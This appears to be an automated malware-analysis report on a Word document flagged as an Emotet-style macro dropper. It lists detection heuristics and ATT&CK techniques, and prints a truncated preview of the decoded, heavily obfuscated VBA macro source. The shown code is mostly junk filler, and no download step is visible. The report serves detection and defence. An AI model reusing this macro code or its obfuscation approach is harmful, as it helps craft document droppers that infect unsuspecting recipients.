MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains heavily obfuscated VBA macros, including a Document_Open auto-exec loader. Critical heuristics indicate the use of Shell() and CreateObject calls, typical for executing downloaded payloads. ClamAV detection as 'Doc.Dropper.Emodldr-6755244-0' further supports its role as a dropper.
Heuristics 9
-
ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.iec.ch In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 199425 bytes |
SHA-256: b1ca751cecade245dec7bd864dd452bc390ce5e25455a4b32c54768088385df8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function DIrYUL(UdlSczD As String, otweswW As Integer, kEcLocE As Integer) As String
qyOmaZt = LTrim("u BWyoo@ mht")
KhvefzAgPz = RTrim("UeM-!Gh^]G QNT.l)]IP")
kaOewnp = RTrim("zoS$a RIUE)X")
BcQIxQmmh = LTrim("^Lgl!^!HKB!ylNZnjo")
XGTbt = LTrim("iXpvBorIJuw%goHul")
WPLodf = 1874 - 1202 - 829
FrifSf = 1381 + 851 + 715
For KdNEUy = 0 To 5
pEgtqoJhq = LTrim("oTyL[@RVYI]a")
WPLodf = 1374 + 1620 + 389
XGTbt = LTrim("jCND-J.ISR?UWJ")
WPLodf = 1979 - 795 - 253
WPLodf = "TVwZqbRgniY]zW-Ud" + "d]KYgGKIWt*GuILS" + "Ra&ET?a(GfSOcbgB%Y&"
FrifSf = Left("x]-d@fPyea@IW-uRt ", 3)
FrifSf = Left("vpE@X*GCQRHUgfa", 2)
SspeHpwaMBRJ = LTrim("&aWA.KiJ-nBTGw[mb!F$")
JzCLMCXsmF = Left("(eKHTd.]dQou@GX&e", 4)
Next KdNEUy
qyOmaZt = Space(8)
SspeHpwaMBRJ = RTrim("!^wue]pHmLTnB")
For UAlfqg = 0 To 2
While inpJNF < 1
yvqFrgZlnk = Right("!wZg*sp@YzPmvsxds", 5)
WPLodf = LTrim("Xuk^W.[a%gL")
FrifSf = Right("jAaBMp(kMH)u(Q^", 2)
inpJNF = inpJNF + 1
Wend
SspeHpwaMBRJ = Right("CBIWp@ZlsAYN#reNf_Y", 3)
QhjEKrxOs = 1787 - 1696 - 240
FrifSf = StrReverse("NM@pr)Vj_[")
FrifSf = UCase("Lly_xXIM%^")
Next UAlfqg
While klQAPQ < 2
qyOmaZt = RTrim("X&(Fl* AoXq")
QhjEKrxOs = StrReverse("TfbYxEa$mWNKaC#-O")
WPLodf = 1810 + 525 + 408
kaOewnp = "f [LWNM!URBckMbVtpJ" + "ZJjygDfsFUmSoCUD" + "CZCRFZ#.dDA"
qyOmaZt = "Jr)mC#vx.DrdTBG(NRAQ" + "TX$dwG qffBYYR)AFnL" + "aEd.]c&id$CO@Yj"
klQAPQ = klQAPQ + 1
Wend
KhvefzAgPz = UCase("(ZE!yng.mRX(Kyfs*n")
BuMHnTUdq = Space(20)
pEgtqoJhq = Right("$SkwR*C(]s!UP&Taq", 4)
JzCLMCXsmF = Left(" Dt$!xrHETwIy", 5)
While fECxKl < 3
qyOmaZt = " [MLHD.r!OIeAsQNw_^." + "DNCt^wDowPnkr-" + "[DTcOelmZC@!T"
TCNcQ = UCase("Oarg#OK&Cg^tqR")
pavVqpSoDxDA = LTrim("ArYWt#zd -BtbFzo")
WPLodf = 1015 + 777 + 1173
qyOmaZt = Right("_INq iWe#FsVKa!g", 5)
XGTbt = Left("Wf%Kzl^kGx", 4)
fECxKl = fECxKl + 1
Wend
kaOewnp = 562 - 336 - 1006
pEgtqoJhq = Left("qh#hirGDAi*K%F%mt*", 2)
yvqFrgZlnk = 711 + 1527 + 293
FrifSf = UCase("OrH-(AxZiQ?&t")
SspeHpwaMBRJ = Left("vrptwyB-UU$]@blbj", 4)
DIrYUL = "kSUcwCAUhHYJNMqyvEOTiC"
End Function
Private Function Dmybaq(YOiEWB As Boolean) As String
KhvefzAgPz = Right("ULuYINaz L", 5)
XGTbt = RTrim("&r!K@y%EPwnBk?.")
kaOewnp = StrReverse("?tZWrf%ES*WNDTKh[")
FrifSf = Right("@KYMNUF)-X$Pfhv", 4)
QhjEKrxOs = 1789 - 1184 - 713
WPLodf = RTrim("g#n^^chbyE[u*EDd")
JzCLMCXsmF = 529 - 977 - 1811
BuMHnTUdq = "pUM_E(x )?n" + "]V#!B.!FrY-gD" + "gylpf(C-Rfkn)zyd$W"
pEgtqoJhq = LTrim("gdBe-dvK*u.xB)sFH")
JzCLMCXsmF = LTrim("?CayoAq[gpcCSza")
TCNcQ = RTrim("S_b&ZJdw_XMOiNA.")
JzCLMCXsmF = LTrim("LY_@hcf.n?yh")
yvqFrgZlnk = RTrim("sTBxYeB!o(&U")
yvqFrgZlnk = Space(19)
KhvefzAgPz = 715 + 1384 + 1614
SspeHpwaMBRJ = "$uQzL*Pdf_N[hXawzUk(" + "HIbc$y.Om!l$g$G%ms" + "_A_eoW$$XtZUa"
kaOewnp = "@r).b(-c%)b[YS" + "qOTYFdA(W%" + ".VK)sltyL@k_LiH"
kaOewnp = Right("xdnysAZ@gF?mcM", 4)
pavVqpSoDxDA = Right("TUdNBBJ]R!#!%Nwy^_", 3)
pEgtqoJhq = RTrim("Wi$zcm*J.ULyznLM(")
KhvefzAgPz = RTrim("FuWudB#KO%EC*g@")
XGTbt = StrReverse("aRiCbTNpR&G*Yllr@r@h")
XGTbt = LTrim(")TFY exekxcexn")
pavVqpSoDxDA = "TpEV@! ZJcZ" + "e$Y])oXAkD^sV^n" + "PB#dFc-repSBe%YaE"
pEgtqoJhq = Left("iBohh#P!T i", 5)
While TpOozy < 4
For YqGpXD = 0 To 9
qyOmaZt = Space(18)
QhjEKrxOs = Space(7)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.